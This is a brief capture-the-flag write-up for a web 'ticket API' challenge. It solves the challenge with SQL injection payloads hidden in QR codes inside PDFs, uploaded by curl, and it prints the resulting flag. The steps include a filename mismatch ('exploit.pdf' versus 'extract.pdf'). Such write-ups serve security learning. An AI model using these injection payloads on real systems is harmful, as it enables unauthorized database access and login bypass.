Tags: sqli .net qr pdf csharp 

Rating:

For web ticket api
Create a PDF with a QR code in it that encodes
```
%' and hash='admin-needs-no-hash
```
I named this one `exploit.pdf`. Upload it to the chall program locally and note down its hash. In my case it was `d735db42e7bbd7043d1ddf07a3a003163f397745`.

Then create another PDF with a QR code, this one encoding
```
da9af4de-54f8-4185-bce3-a5095ca83646'
, 'd735db42e7bbd7043d1ddf07a3a003163f397745'); --
```
the first string is any random UUID so it passes the guid check, the second string is the hash of `exploit.pdf`
I named this one `inject.pdf`

Then I ran:
```sh
curl -X POST -F "file=@./inject.pdf" https://ticket-api-061f5e195e3d.1753ctf.com/upload
"Ticket added"
```
and
```sh
curl -X POST -F "file=@./extract.pdf" https://ticket-api-061f5e195e3d.1753ctf.com/verify
{"id":1,"code":"1753c{dizz_are_not_forged_if_they_have_the_same_hasshhh}","hash":"admin-needs-no-hash"}
```